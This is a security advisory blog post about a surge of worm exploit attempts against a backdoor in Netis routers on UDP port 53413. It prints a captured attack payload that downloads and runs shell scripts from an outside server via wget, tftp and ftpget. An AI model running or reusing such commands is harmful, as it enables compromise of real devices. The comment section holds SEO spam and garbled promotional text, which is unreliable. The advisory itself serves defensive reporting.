Surge in Exploit Attempts for Netis Router Backdoor (UDP/53413)

Published: 2016-08-04
Last Updated: 2016-08-04 11:12:34 UTC
by Johannes Ullrich (Version: 1)
1 comment(s)

We started to see a surge in attempts to exploit a well known back door in Netis routers. The backdoor was first described in 2014 by TrendLabs [1]. Netis routers are used predominantly in China, but can occasionally be found in other parts of the world. 

Exploitation of the backdoor is easy: Any payload sent to port 53413/UDP is automatically executed. Various exploit tools for this issue are available, but probably all you need is netcat to trigger the problem. (thanks to Bill for pointing this out!)

About a week ago, the number of exploit attempts detected by DShield skyrocketed, and given the rapid increase not only in targets, but also in sources that do the scanning, a worm is likely to blame that will infect vulnerable routers and turn them into scanners.

It only took me seconds to capture an exploit attempt (I formated the bash code for readability). The IP address of the web/ftp/tftp server below is different from the IP address the attack came from, so unlike other worms, the victim does not appear to be offering the files for download.

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
wget http://49.50.71.149/bins.sh; chmod 777 bins.sh; sh bins.sh;
tftp 49.50.71.149 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh;
tftp -r tftp2.sh -g 49.50.71.149; chmod 777 tftp2.sh; sh tftp2.sh;
ftpget -v -u anonymous -p anonymous -P 21 49.50.71.149 ftp1.sh ftp1.sh; sh ftp1.sh;
 rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *.

bins.sh attempts to download some files compiled for the MIPS platform, which matches the affective Netis routers. Downloads are slow, indicating that the server delivering them may be rather busy, but the IP address above is not the only IP address seen in thse attacks. But att his point, it is highly unlikely that any vulnerable devices are still unexploited.

[1] http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

Keywords:
1 comment(s)
August issue of Securing the Human Ouch! Focuses on Ransomware https://securingthehuman.sans.org/ouch
ISC Stormcast For Thursday, August 4th 2016 http://isc.sans.edu/podcastdetail.html?id=5111

Comments

cwqwqwq
eweew<a href="https://www.seocheckin.com/edu-sites-list/">mashood</a>
WQwqwqwq[url=https://www.seocheckin.com/edu-sites-list/]mashood[/url]
dwqqqwqwq mashood
[https://isc.sans.edu/diary.html](https://isc.sans.edu/diary.html)
[https://isc.sans.edu/diary.html | https://isc.sans.edu/diary.html]
What's this all about ..?
password reveal .
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure:

<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.

<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
https://thehomestore.com.pk/

Diary Archives